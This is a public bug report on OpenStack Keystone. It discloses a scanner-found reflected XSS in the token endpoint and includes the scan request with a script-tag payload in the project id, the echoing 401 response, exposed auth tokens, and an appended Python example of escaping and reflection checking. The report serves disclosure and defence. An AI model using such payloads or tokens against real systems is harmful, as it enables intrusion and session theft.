Public bug reported: Using the WebInspect tool to test, the test results show that there are XSS issues.
Critical Issues
Cross-Site Scripting: Reflected (5649)
CWE: 79, 80, 82, 83, 87, 116, 692, 811
Kingdom: Input Validation and Representation
Page:
Parameter: $.auth.scope.project.id

Request:
POST /v3/auth/tokens HTTP/1.1
Host: 10.62.48.69
Content-Length: 336
Cache-Control: no-cache
User-Id: fcebae72c7b34e259be8f003499a4bd1
Pragma: no-cache
Origin: https://10.62.48.69
Project-Id: 14f32da561324e2c8790c60558844a0a
Access-Token: gAAAAABcwW-3ahN06YGt69MyU4GULjxlkWAzC0w5eYf88JqK07CKjdmNWZo42VLhMLS308BEH98vIcD3aCXJ9XlJnByuVvkqJYRjqSS2DLJBr0s6UHMBPsQlotM0_2w_fmn9Xhx0-lftDvdn9xO9Kn_zwuY2Odb7GQ
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Auth-Token: gAAAAABcwW_XT5iUG2uH0kSm_594hJb-k1_utLvDp1DTPB-ZNByJ0CZLYwCwH8V7vufMASXtt6L0KlXLL_rQdFYjleCF7rai5WxpAsY1SwjejsIvKBU05m1jmi_AVJKzICXnZC7vcM0AwHQ1v_ZEasXDeKFkwz7W2Dp8QymzUBoQMlwRX6Ta9yWAWk-M9LxWD3GtzLIOoOzR
IsScopeDomain: false
siderbarBoolMsg: cloudManagementViewBool
If-Modified-Since: Mon, 26 Jul 1997 05:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
operateuser: admin
Referer: https://10.62.48.69/ngportal/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: Keep-Alive
X-WIPP: AscVersion=18.20.178.0
X-Scan-Memo: Category="Audit.Attack"; SID="C13A9BA9ACA4260D094783D9B4A13852"; PSID="2BA1D619C8CFF66416259BDDB34002B6"; SessionType="AuditAttack"; CrawlType="None"; AttackType="PostSubParamInjection"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="13"; AttackParamDesc="%24.auth.scope.project.id"; AttackParamIndex="0"; AttackParamSubIndex="2"; CheckId="5105"; Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="14f32da561324e2c8790c60558844a0a%253c%2573%2543%2572%2549%2570%2554%2520%2574%2559%2570%2545%253d%2574%2545%2578%2554%252f%2576%2542%2573%2543%2572%2549%2570%2554%253e%254d%2573%2567%2542%256f%2578%2528%2537%2532%2532%2534%2533%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e"; AttackStringProps="Attack"; ThreadId="493"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: RequestorThreadIndex="6"; sid="825"; smi="0"; sc="1"; ID="dc87d526-e838-4f7c-9b79-94723727e38a";
X-Request-Memo: ID="520187c2-3597-4998-a2eb-68db0ae93a5b"; sc="1"; ThreadId="493";
Cookie: CustomCookie=WebInspect0

{"auth":{"identity":{"methods":["token"],"token":{"id":"gAAAAABcwW-3ahN06YGt69MyU4GULjxlkWAzC0w5eYf88JqK07CKjdmNWZo42VLhMLS308BEH98vIcD3aCXJ9XlJnByuVvkqJYRjqSS2DLJBr0s6UHMBPsQlotM0_2w_fmn9Xhx0-lftDvdn9xO9Kn_zwuY2Odb7GQ"}},"scope":{"project":{"id":"14f32da561324e2c8790c60558844a0a<sCrIpT tYpE=tExT\/vBsCrIpT>MsgBox(72243) <\/sCrIpT>"}}}}

Response:
HTTP/1.1 401 Unauthorized
Server: IAGV3.06.01
Date: Thu, 25 Apr 2019 09:13:44 GMT
Content-Type: application/json
Content-Length: 226
Connection: keep-alive
Vary: X-Auth-Token
x-openstack-request-id: req-1b47ef10-ece1-41b1-8b56-88a4aba415b0
WWW-Authenticate: Keystone uri="https://10.62.48.69"

...TRUNCATED...not find project: 14f32da561324e2c8790c60558844a0a <sCrIpT tYpE=tExT/vBsCrIpT>MsgBox(72243)</sCrIpT> (Disable insecure_debug mode to suppress these de...TRUNCATED...

** Affects: keystone
   Importance: Undecided
   Status: New

--
You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone).
https://bugs.launchpad.net/bugs/1829594

Title:
  Find XSS issue in test

Status in OpenStack Identity (keystone):
  New

Bug description:
  Using the WebInspect tool to test, the test results show that there are XSS issues.
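As an added illustration (not keystone's code and not part of the report), the Python below models what the scanner flagged: with insecure_debug on, the raw scope id from the request body is copied into the 401 error message, which the report shows served as application/json. Beside it sits a hardened variant that echoes only ids of the expected shape and escapes anything else, plus a reflection check of the kind the scanner performs; the 32-hex project id format, the message wording and the placeholder token are assumptions of the example.

```python
import html
import json
import re

# Constructed sample modelled on the scanner request in the report; the
# token id is a placeholder, not the real value.
INJECTED_ID = ("14f32da561324e2c8790c60558844a0a"
               "<sCrIpT tYpE=tExT/vBsCrIpT>MsgBox(72243)</sCrIpT>")
SAMPLE_REQUEST = {"auth": {"identity": {"methods": ["token"],
                                        "token": {"id": "PLACEHOLDER_TOKEN"}},
                           "scope": {"project": {"id": INJECTED_ID}}}}

# Assumption: project ids have the 32-hex shape seen in the report.
PROJECT_ID_RE = re.compile(r"^[0-9a-f]{32}$")
GENERIC_401 = "The request you have made requires authentication."


def debug_message(project_id, insecure_debug):
    """Reported behaviour: with insecure_debug on, the scope id from the
    request body is copied verbatim into the 401 error message."""
    if not insecure_debug:
        return GENERIC_401
    return "Could not find project: %s" % project_id


def hardened_message(project_id, insecure_debug):
    """Echo only an id of the expected shape; anything else is described
    and HTML-escaped, so markup never reaches the message unchanged."""
    if not insecure_debug:
        return GENERIC_401
    if PROJECT_ID_RE.match(project_id):
        return "Could not find project: %s" % project_id
    return "Could not find project: (%d-byte value, shown escaped) %s" % (
        len(project_id), html.escape(project_id, quote=True))


def error_body(message):
    """JSON 401 body in the shape keystone returns as application/json."""
    return json.dumps({"error": {"code": 401, "message": message,
                                 "title": "Unauthorized"}})


def reflected_unescaped(request, response_body,
                        path=("auth", "scope", "project", "id")):
    """Scanner-style check: True when the request value at `path` carries
    markup and appears unchanged in the JSON error message."""
    value = request
    for key in path:
        value = value[key]
    message = json.loads(response_body)["error"]["message"]
    return "<" in value and value in message
```

Turning insecure_debug off removes the reflection entirely, which is the operational fix the response text itself points to; the hardened builder shows how to keep debug detail without echoing untrusted markup.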